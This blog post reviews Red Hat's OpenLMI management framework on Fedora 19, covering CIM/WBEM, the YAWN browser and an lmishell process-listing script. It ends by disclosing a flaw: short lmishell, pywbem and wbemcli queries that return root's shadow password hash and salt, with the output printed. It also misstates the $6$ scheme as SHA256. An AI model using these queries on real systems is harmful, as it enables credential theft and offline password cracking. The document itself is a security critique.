According to the OpenLMI project webpage:
OpenLPI provides a common infrastructure for the management of Linux systems. Capabilities include configuration, management and monitoring of hardware, operating systems, and system services. OpenLMI includes a set of services that can be accessed both locally and remotely, multiple language bindings, standard APIs, and standard scripting interfaces.
OpenLMI is a another attempt by Red Hat to provide unified management of Linux systems. This is not their first attempt to provide such functionality. Their previous (failed) attempt back in the 2010/2011 era was called Matahari and was based on Apache Qpid QMF (AMQP Messaging – Qpid Management Framework). The Matahari agent framework (matahari-*) packages were deprecated in the Red Hat Enterprise Linux 6.3 release.
It is based on DTMF (Distributed Management Task Force) CIM (Common Information Model). Yes, I hear your groans! I also groaned when I first heard about OpenLMI and its use of CIM. I have many scars from using CIM in the late 1990s. In my humble opinion, some of the CIM schemas make no sense except to individual companies. For example the DMTF networking schema was essentially written by Citrix and is probably only used by Citrix. BTW, DMTF used be called the Desktop Management Task Force.
The primary focus of OpenLMI appears to be configuring and managing enterprise hardware, especially storage and networks. OpenLMI can be used on either physical servers or on virtual machine guests. By design, OpenLMI provides a common management interface to multiple versions of Red Hat Enterprise Linux (RHEL) and Fedora. It is intended to provide an abstraction layer to hide much of the complexity of the underlying system from systems administrators.
Architecturally, OpenLMI consists of system management agents installed on a managed system, a controller to manage these agents and provide an interface to them, and client applications or scripts which call the management agents through the controller. OpenLMI leverages existing standard-based infrastructure components already existing in RHEL and Fedora such as Pegasus CIMOM but provides new (OpenLMI) system agents. Note that CIMOM (Common Information Model Object Manager) is also a CIM object. System agents are more commonly called providers in OpenLMI.
Providers currently available include:
- Networking – providers for network management
- Account Management – providers for management of users and groups
- Proxy – generator of provider handing over requests processing to CIMMOM
- Storage Management – providers for management of storage and mounting. It uses Blivet, the former Anaconda storage library, to manage storage.
- Software Management – providers for management of software
OpenLMI does not attempt to deliver a complete systems management solution. It simply provides the low-level functions, capabilities and interfaces (APIs) that can be called from scripts or system management consoles. Supported interfaces include C, C++, Python, Java, and a OpenLMI shell. These interfaces are implemented as language bindings to the underlying system agents.
Fedora 19 does not install OpenLMI by default. An OpenLMI controller and a set of OpenLMI agents must be installed on the system to be managed. Specifically, OpenLMI requires you to install WBEM (Web-Based Enterprise Management) support on your system. Either OpenPegasus or the Small Footprint CIM Broker (SFCB) package can be used. OpenPegasus is an open-source implementation of the DMTF CIM and WBEM standards. It is written in C++ and is a comprehensive implementation. SFCB is a CIM server for resource-constrained and embedded environments. It is written in C and designed to be modular and lightweight. For the purposes of this blog, I used the OpenPegasus package.
If you use the Pegasus package, a user called pegasus is created on your system. You have to set the password for pegasus using the passwd command and then restart the tog-pegasus service.
Another package that I installed was YAWN (Yet Another WBEM Navigator). YAWN is a web browser-based CIM client. It runs under Apache and requires mod-python. Currently YAWN works with SFCB, Pegasus, and OpenWBEM.
To show you how convoluted and unwieldy CIM namespaces can be, let us use YAWN to explore what CIM exposes. If you point your favourite web browser to http://localhost/yawn/, this is the initial webpage that you should be:
Type in localhost as the Host, and click the Login button. After entering the credentials for the pegasus user, you should see a list of namespaces.
Select root/cimv2 and all the CIM classes for root/cimv2 are displayed.
If you select the Linux_UnixProcess class you will see a webpage something like the following:
Click on the Instance names link to get a listing of all instances of Linux_UnixProcess. Essentially, this is a listing of all the processes on your system:
Here is what the output looks like if I get details of instance (process) number 9:
You can also programmatically obtain information from CIMOM about processes and more. Here is an example of how to use the lmishell to get information about processes.
$ cat demo.py #!/usr/bin/lmishell c = connect("localhost", "user", "password") procs = c.root.cimv2.Linux_UnixProcess.instances() for p in procs: # print "{} {} {} {}".format(p.handle, p.ParentProcessID, p.Name, p.CreationDate) print "%6s %6s %s %s" % (p.handle, p.ParentProcessID, p.CreationDate, p.Name) $ ./demo.py 1 0 systemd 20130711002020.000000-300 2 0 kthreadd 20130711002020.000000-300 3 2 ksoftirqd/0 20130711002020.000000-300 5 2 kworker/0:0H 20130711002020.000000-300 7 2 kworker/u:0H 20130711002020.000000-300 8 2 migration/0 20130711002020.000000-300 9 2 rcu_bh 20130711002020.000000-300 10 2 rcu_sched 20130711002020.000000-300 11 2 watchdog/0 20130711002020.000000-300 12 2 watchdog/1 20130711002020.000000-300 13 2 migration/1 20130711002020.000000-300 14 2 ksoftirqd/1 20130711002020.000000-300 16 2 kworker/1:0H 20130711002020.000000-300 17 2 watchdog/2 20130711002020.000000-300 18 2 migration/2 20130711002020.000000-300 19 2 ksoftirqd/2 20130711002020.000000-300 21 2 kworker/2:0H 20130711002020.000000-300 22 2 watchdog/3 20130711002020.000000-300 23 2 migration/3 20130711002020.000000-300 24 2 ksoftirqd/3 20130711002020.000000-300 26 2 kworker/3:0H 20130711002020.000000-300 27 2 khelper 20130711002020.000000-300 28 2 kdevtmpfs 20130711002020.000000-300 29 2 netns 20130711002020.000000-300 30 2 bdi-default 20130711002020.000000-300 31 2 kintegrityd 20130711002020.000000-300 32 2 kblockd 20130711002020.000000-300 33 2 ata_sff 20130711002020.000000-300 34 2 khubd 20130711002020.000000-300 35 2 md 20130711002020.000000-300 60 2 kswapd0 20130711002020.000000-300 61 2 ksmd 20130711002020.000000-300 62 2 khugepaged 20130711002020.000000-300 63 2 fsnotify_mark 20130711002020.000000-300 64 2 crypto 20130711002020.000000-300 72 2 kthrotld 20130711002020.000000-300 75 2 scsi_eh_0 20130711002020.000000-300 76 2 scsi_eh_1 20130711002020.000000-300 77 2 scsi_eh_2 20130711002020.000000-300 78 2 scsi_eh_3 20130711002020.000000-300 79 2 scsi_eh_4 20130711002020.000000-300 80 2 scsi_eh_5 20130711002020.000000-300 86 2 kpsmoused 20130711002020.000000-300 88 2 deferwq 20130711002020.000000-300 96 2 kauditd 20130711002021.000000-300 149 2 kworker/1:1H 20130711002021.000000-300 151 2 scsi_eh_6 20130711002021.000000-300 152 2 scsi_wq_6 20130711002021.000000-300 153 2 kworker/0:1H 20130711002021.000000-300 154 2 kworker/3:1H 20130711002021.000000-300 157 2 kworker/2:1H 20130711002021.000000-300 166 2 jbd2/sda3-8 20130711002027.000000-300 167 2 ext4-dio-unwrit 20130711002027.000000-300 207 1 systemd-journald 20130711002029.000000-300 217 1 lvmetad 20130711002030.000000-300 235 1 systemd-udevd 20130711002031.000000-300 288 2 hd-audio0 20130711002032.000000-300 309 2 kvm-irqfd-clean 20130711002032.000000-300 335 2 jbd2/sda2-8 20130711002035.000000-300 336 2 ext4-dio-unwrit 20130711002035.000000-300 349 2 jbd2/sda5-8 20130711002037.000000-300 350 2 ext4-dio-unwrit 20130711002037.000000-300 353 2 jbd2/sdb1-8 20130711002038.000000-300 354 2 ext4-dio-unwrit 20130711002038.000000-300 359 1 auditd 20130711002038.000000-300 365 359 audispd 20130711002038.000000-300 367 365 sedispatch 20130711002038.000000-300 375 1 alsactl 20130711002038.000000-300 377 1 python 20130711002038.000000-300 379 1 irqbalance 20130711002038.000000-300 382 1 smartd 20130711002038.000000-300 384 1 rsyslogd 20130711002038.000000-300 388 1 systemd-logind 20130711002038.000000-300 389 1 gpm 20130711002038.000000-300 390 1 cupsd 20130711002038.000000-300 391 1 dbus-daemon 20130711002038.000000-300 393 1 chronyd 20130711002038.000000-300 394 1 gdm 20130711002038.000000-300 395 1 crond 20130711002038.000000-300 396 1 atd 20130711002038.000000-300 401 1 acpid 20130711002038.000000-300 403 1 mcelog 20130711002038.000000-300 407 394 gdm-simple-slave 20130711002038.000000-300 413 1 colord 20130711002045.000000-300 415 1 NetworkManager 20130711002045.000000-300 440 407 Xorg 20130711002045.000000-300 455 1 modem-manager 20130711002045.000000-300 461 1 libvirtd 20130711002045.000000-300 465 1 rpcbind 20130711002045.000000-300 483 1 httpd 20130711002045.000000-300 485 1 sshd 20130711002045.000000-300 488 1 accounts-daemon 20130711002045.000000-300 544 1 sendmail: 20130711002045.000000-300 586 1 sendmail: 20130711002045.000000-300 731 1 console-kit-daemon 20130711002046.000000-300 934 1 upowerd 20130711002047.000000-300 1029 1 rtkit-daemon 20130711002047.000000-300 1095 483 httpd 20130711002048.000000-300 1096 483 httpd 20130711002048.000000-300 1097 483 httpd 20130711002048.000000-300 1098 483 httpd 20130711002048.000000-300 1099 483 httpd 20130711002048.000000-300 1123 1 dnsmasq 20130711002048.000000-300 1269 407 gdm-session-worker 20130711002111.000000-300 1277 1 gnome-keyring-daemon 20130711002115.000000-300 1279 1269 gnome-session 20130711002115.000000-300 1287 1 dbus-launch 20130711002115.000000-300 1288 1 dbus-daemon 20130711002115.000000-300 1352 1 gvfsd 20130711002115.000000-300 1373 1 gvfsd-fuse 20130711002115.000000-300 1447 1 at-spi-bus-launcher 20130711002116.000000-300 1451 1447 dbus-daemon 20130711002116.000000-300 1454 1 at-spi2-registryd 20130711002116.000000-300 1463 1279 gnome-settings-daemon 20130711002116.000000-300 1480 1 pulseaudio 20130711002116.000000-300 1502 1 gvfs-udisks2-volume-monitor 20130711002117.000000-300 1504 1 udisksd 20130711002117.000000-300 1509 1480 gconf-helper 20130711002117.000000-300 1512 1 gconfd-2 20130711002117.000000-300 1515 1 gvfs-gphoto2-volume-monitor 20130711002117.000000-300 1519 1 gvfs-afc-volume-monitor 20130711002117.000000-300 1531 1 gsd-printer 20130711002118.000000-300 1533 1 dconf-service 20130711002118.000000-300 1545 1279 gnome-shell 20130711002118.000000-300 1550 1 ibus-daemon 20130711002118.000000-300 1558 1550 ibus-dconf 20130711002118.000000-300 1561 1 ibus-x11 20130711002118.000000-300 1569 1 gnome-shell-calendar-server 20130711002118.000000-300 1577 1 evolution-source-registry 20130711002119.000000-300 1583 1 mission-control-5 20130711002119.000000-300 1588 1550 ibus-engine-simple 20130711002119.000000-300 1590 1 goa-daemon 20130711002119.000000-300 1624 1279 nm-applet 20130711002119.000000-300 1627 1279 python 20130711002119.000000-300 1632 1279 tracker-miner-fs 20130711002119.000000-300 1633 1279 deja-dup-monitor 20130711002119.000000-300 1635 1279 tracker-store 20130711002119.000000-300 1636 1279 evolution-alarm-notify 20130711002120.000000-300 1656 1279 abrt-applet 20130711002120.000000-300 1674 1 evolution-calendar-factory 20130711002121.000000-300 1694 1279 zeitgeist-datahub 20130711002121.000000-300 1701 1 zeitgeist-daemon 20130711002121.000000-300 1755 1 zeitgeist-fts 20130711002121.000000-300 1808 1755 cat 20130711002121.000000-300 1831 1 evolution-addressbook-factory 20130711002122.000000-300 1873 1 gvfsd-burn 20130711002124.000000-300 3152 2 lpfc_worker_0 20130711034101.000000-300 3155 2 kworker/u:28 20130711034101.000000-300 3156 2 kworker/u:29 20130711034101.000000-300 3764 1 gnome-terminal-server 20130711044843.000000-300 3767 3764 gnome-pty-helper 20130711044843.000000-300 3768 3764 bash 20130711044843.000000-300 6306 415 dhclient 20130711121940.000000-300 6690 1 gvfsd-metadata 20130711131148.000000-300 7069 1 gvfsd-trash 20130711140717.000000-300 7423 2 kworker/3:2 20130711141548.000000-300 7513 1 polkitd 20130711144803.000000-300 8389 2 kworker/2:2 20130711170830.000000-300 8404 2 kworker/1:0 20130711171356.000000-300 8453 2 kworker/1:1 20130711172515.000000-300 8567 1545 firefox 20130711174340.000000-300 8642 483 httpd 20130711174402.000000-300 8644 483 httpd 20130711174403.000000-300 8808 2 kworker/3:0 20130711175401.000000-300 8843 1 cimserver 20130711175750.000000-300 9060 2 kworker/0:0 20130711180701.000000-300 9205 2 flush-8:0 20130711183706.000000-300 9237 2 flush-8:16 20130711190030.000000-300 9260 2 kworker/2:0 20130711190100.000000-300 9589 483 httpd 20130711191642.000000-300 9590 483 httpd 20130711191643.000000-300 9591 483 httpd 20130711191643.000000-300 9906 3764 bash 20130711193523.000000-300 9994 2 kworker/0:1 20130711193700.000000-300 10063 8567 plugin-container 20130711193829.000000-300 10096 1545 nautilus 20130711193959.000000-300 10155 1 cimprovagt 20130711194458.000000-300 10194 1 packagekitd 20130711194803.000000-300 10229 3768 python 20130711194912.000000-300 10230 10155 sh None 10231 10230 ps None
Security in OpenLMI is problematic. For example, I can, as a regular user, return the encoded password of another user if I know the CIMOM username and password.
$ cat demo1.py #!/bin/lmishell c = connect("localhost", "username", "passsword") p = c.root.cimv2.LMI_Account.first_instance(key="name", value="root") print "{} {}".format (p.Name, p.userPassword) $ ./demo1.py root [u'$6$OeHcJ066CyxGYah5$248KbUKRDZ/d8JAbouLsmkLTXZhAQeUMrY8YaMlF5kAQt754logoG9VwuWrLcaCPb0b3lcw0Qui2kBNRmGJNx0']
Note how easy it is the retrieve the encrypted password for root from /etc/shadow. We also get the password encoding scheme (6 = SHA256) and the salt!
$ cat demo2.py #!/bin/python import pywbem url = "https://localhost:5989" username = "pegasus" password = "password" c = pywbem.WBEMConnection(url, (username, password),) slct = 'select Name, userPassword from LMI_Account where Name = "root"' #print c.ExecQuery('WQL', slct)[0].tomof() p = c.ExecQuery('WQL', 'select Name, userPassword from LMI_Account where Name = "root"') print p[0].tomof() $ ./demo2.py instance of LMI_Account { UserPassword = {"$6$OeHdJ066CyxGYah5$248KbUPRDZ/d8JAbouLsmkLTXZqAQeUMrY8YxMlF2kAQt754lggoG9VsuWrLcaCPb0b4lcw0Qui2kKNRmAJNx0"}; Name = "root"; };
As you can see from the above, this is not a specific problem with lmishell; it is a systematic problem. pywbem is a Python library for making CIM operations over HTTP using the WBEM CIM-XML protocol. YAWN also uses pywbem. In pywbem, the local namespace is root/cimv2.
If you install the sblim-wbemcli package you call also access this data using wbemcli
$ wbemcli -noverify gi -nl 'https://pegasus:password@localhost:5989/root/cimv2:LMI_Account.Name="root",CreationClassName="LMI_Account",SystemCreationClassName="Linux_ComputerSystem",SystemName="ultra.xfpmurphy.com"' localhost:5989/root/cimv2:LMI_Account.Name="root",CreationClassName="LMI_Account",SystemCreationClassName="Linux_ComputerSystem",SystemName="ultra.xfpmurphy.com" -InstanceID= -Caption= -Description= -ElementName="root" -Generation= -InstallDate= -OperationalStatus= -StatusDescriptions= -Status= -HealthState= -CommunicationStatus= -DetailedStatus= -OperatingStatus= -PrimaryStatus= -EnabledState=5 -OtherEnabledState= -RequestedState=12 -EnabledDefault=2 -TimeOfLastStateChange= -AvailableRequestedStates= -TransitioningToState=12 -SystemCreationClassName="Linux_ComputerSystem" -SystemName="ultra.xfpmurphy.com" -CreationClassName="LMI_Account" -Name="root" -UserID="0" -ObjectClass= -Descriptions= -Host="ultra.xfpmurphy.com" -LocalityName= -OrganizationName="" -OU= -SeeAlso= -UserCertificate= -UserPassword="$6$OeHcJ066CyxGYah5$268KbUKRDZ/d8JAGoismkLTXZqAQeUOrY8YxMlF5kAQt754lggoG9VsuWrLcaCPb0b3lcw0Qui2kKNRmGJNx0" -PasswordHistoryDepth= -PasswordExpiration= -ComplexPasswordRulesEnforced= -InactivityTimeout= -MaximumSuccessiveLoginFailures= -LastLogin=20130704161216.000000+000 -UserPasswordEncryptionAlgorithm= -OtherUserPasswordEncryptionAlgorithm= -UserPasswordEncoding=2 -HomeDirectory="/root" -LoginShell="/bin/bash" -PasswordLastChange=20120519000000.000000+000 -PasswordPossibleChange=00000000000000.000000:000 -PasswordExpirationWarning= -PasswordInactivation= -AccountExpiration=
OpenLMI is in the early stage of development. Not all functionality is available. The OpenLMI developers appear to welcome input from interested parties and that is goodness. Will OpenLMI succeed? Possibly if OpenLMI successfully integrates with established control panels like cPanel or Plesk. However, until the security holes in OpenLMI are plugged, no system administrator should deploy OpenLMI on any systems that need to be secure.